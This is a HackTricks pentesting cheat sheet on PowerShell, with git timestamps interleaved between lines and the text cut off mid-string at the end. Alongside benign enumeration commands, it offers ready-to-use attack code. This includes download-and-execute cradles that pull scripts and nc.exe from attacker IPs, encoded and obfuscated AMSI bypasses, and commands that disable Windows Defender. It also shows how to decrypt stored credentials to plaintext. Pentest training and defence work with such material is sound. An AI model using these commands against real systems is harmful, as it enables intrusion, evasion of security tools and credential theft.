2022-05-29 12:54:31 +00:00
# Basic PowerShell for Pentesters
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-10-04 23:18:19 +00:00
* Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-05-09 09:37:25 +00:00
* **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2022-12-31 17:21:45 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **and** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2022-05-29 12:54:31 +00:00
## Default PowerShell locations
2020-08-17 14:38:36 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-08-17 14:38:36 +00:00
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
2022-05-29 12:54:31 +00:00
## Basic PS commands to start
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module < modulepath >
Get-Command -Module < modulename >
```
2022-05-29 12:54:31 +00:00
## Download & Execute
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2023-05-29 20:18:06 +00:00
g
2020-07-15 15:43:14 +00:00
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
2022-09-09 11:00:52 +00:00
#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
2020-07-15 15:43:14 +00:00
```
2022-05-29 12:54:31 +00:00
### Download & Execute in background with AMSI Bypass
2021-10-25 23:03:11 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2021-10-25 23:03:11 +00:00
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
```
2022-05-29 12:54:31 +00:00
### Using b64 from linux
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc < BASE64_ENCODED_PAYLOAD >
```
2022-05-29 12:54:31 +00:00
## Download
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
### System.Net.WebClient
2020-09-07 11:12:11 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
2020-09-05 18:39:37 +00:00
```
2022-05-29 12:54:31 +00:00
### Invoke-WebRequest
2020-09-07 11:12:11 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
2020-09-05 18:39:37 +00:00
```
2022-05-29 12:54:31 +00:00
### Wget
2020-09-07 11:12:11 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
2020-09-05 18:39:37 +00:00
```
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
### BitsTransfer
2020-09-07 11:12:11 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
2020-09-05 18:39:37 +00:00
# OR
2020-07-15 15:43:14 +00:00
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
```
2022-05-29 12:54:31 +00:00
## Base64 Kali & EncodedCommand
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand < Base64 >
```
2022-10-05 00:11:28 +00:00
## [Execution Policy](../authentication-credentials-uac-and-efs.md#ps-execution-policy)
2020-07-15 15:43:14 +00:00
2022-12-31 17:21:45 +00:00
## [Constrained language](broken-reference/)
2020-07-15 15:43:14 +00:00
2022-12-31 17:21:45 +00:00
## [AppLocker Policy](broken-reference/)
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
## Enable WinRM (Remote PS)
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
enable-psremoting -force #This enables winrm
2022-05-01 12:49:36 +00:00
# Change NetWorkConnection Category to Private
2020-07-15 15:43:14 +00:00
#Requires -RunasAdministrator
Get-NetConnectionProfile |
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}
```
2022-08-12 23:51:41 +00:00
## Disable Defender
2020-07-15 15:43:14 +00:00
2023-05-09 09:37:25 +00:00
{% code overflow="wrap" %}
2022-08-18 23:30:34 +00:00
```powershell
2022-08-12 23:51:41 +00:00
# Check status
2020-07-15 15:43:14 +00:00
Get-MpComputerStatus
2022-08-18 23:30:34 +00:00
Get-MpPreference | select Exclusion* | fl #Check exclusions
2022-08-12 23:51:41 +00:00
# Disable
2020-07-15 15:43:14 +00:00
Set-MpPreference -DisableRealtimeMonitoring $true
2022-08-12 23:51:41 +00:00
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
2023-05-09 09:37:25 +00:00
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
Add-MpPreference -ExclusionPath (pwd)
2022-08-18 23:30:34 +00:00
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
2020-07-15 15:43:14 +00:00
```
2023-05-09 09:37:25 +00:00
{% endcode %}
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
### AMSI bypass
2023-05-09 09:37:25 +00:00
**`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control** , you can change its behaviour by **overwriting instructions in memory** . Making it not detect anything.
2022-08-18 22:59:20 +00:00
Therefore, the goal of the AMSI bypasses you will are are to **overwrite the instructions of that DLL in memory to make the detection useless** .
2022-09-27 00:18:19 +00:00
**AMSI bypass generator** web page: [**https://amsi.fail/** ](https://amsi.fail/ )
2022-05-29 12:54:31 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2022-05-29 12:54:31 +00:00
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
& ( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)
# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/
# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass
# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
```
2022-12-31 17:21:45 +00:00
### AMSI Bypass 2 - Managed API Call Hooking
2023-05-09 09:37:25 +00:00
Check [**this post for detailed info** ](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/ )\*\*\*\*[ **and the code** ](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/ ).
2022-12-31 17:21:45 +00:00
This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.
The steps performing API cal hooking of .NET methods are:
1. Identify the target method to hook
2. Define a method with the same function prototype as the target
3. Use reflection to find the methods
4. Ensure each method has been compiled
5. Find the location of each method in memory
6. Overwrite the target method with instructions pointing to our malicious method
2022-05-29 12:54:31 +00:00
## PS-History
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
2022-08-13 15:36:34 +00:00
## Get permissions
2022-08-18 23:30:34 +00:00
```powershell
2022-08-13 15:36:34 +00:00
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```
2022-05-29 12:54:31 +00:00
## OS version and HotFixes
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
```
2022-05-29 12:54:31 +00:00
## Environment
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value
```
2022-05-29 12:54:31 +00:00
## Other connected drives
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
2022-05-29 12:54:31 +00:00
### Recycle Bin
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
```
[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/ ](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/ )
2022-05-29 12:54:31 +00:00
## Domain Recon
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="powerview.md" %}
[powerview.md ](powerview.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
## Users
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
2022-05-29 12:54:31 +00:00
## Secure String to Plaintext
2020-07-27 17:54:30 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-27 17:54:30 +00:00
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
2020-10-28 13:38:58 +00:00
Or directly parsing form XML:
2022-08-18 23:30:34 +00:00
```powershell
2020-10-28 13:38:58 +00:00
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
```
2022-05-29 12:54:31 +00:00
## SUDO
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '< PASSWORD > ' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("< USERNAME > ", $pass)
2021-01-23 16:26:36 +00:00
#For local:
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
#For WINRM
2020-07-15 15:43:14 +00:00
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command & {Start-Process C:\xyz\nc.bat -verb Runas}'
2020-08-17 15:37:19 +00:00
#Another method
$secpasswd = ConvertTo-SecureString "< password > " -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("< user > ", $secpasswd)
$computer = "< hostname > "
2020-07-15 15:43:14 +00:00
```
2022-05-29 12:54:31 +00:00
## Groups
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
```
2022-05-29 12:54:31 +00:00
## Clipboard
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Clipboard
```
2022-05-29 12:54:31 +00:00
## Processes
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
2022-05-29 12:54:31 +00:00
## Services
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Get-Service
```
2022-05-29 12:54:31 +00:00
## Password from secure string
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
```
2022-05-29 12:54:31 +00:00
## Scheduled Tasks
2020-08-17 14:38:36 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-08-17 14:38:36 +00:00
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
2022-05-29 12:54:31 +00:00
## Network
2020-07-15 15:43:14 +00:00
2022-05-29 12:54:31 +00:00
### Interfaces
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
2022-06-15 20:54:51 +00:00
### Firewall
2022-08-18 23:30:34 +00:00
```powershell
2022-06-15 20:54:51 +00:00
Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow
2023-05-10 11:58:37 +00:00
# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow
2022-06-15 20:54:51 +00:00
# Get name, proto, local and rremote ports, remote address, penable,profile and direction
## You can user the following line changing the initial filters to indicat a difefrent direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
```
2022-05-29 12:54:31 +00:00
### Route
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
route print
```
2022-05-29 12:54:31 +00:00
### ARP
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
2022-05-29 12:54:31 +00:00
### Hosts
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
2022-05-29 12:54:31 +00:00
### Ping
2021-01-24 15:20:05 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2021-01-24 15:20:05 +00:00
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
```
2022-05-29 12:54:31 +00:00
### SNMP
2020-07-15 15:43:14 +00:00
2022-08-18 23:30:34 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
2022-10-05 20:40:19 +00:00
## **Converting the SDDL String into a Readable Format**
```powershell
PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-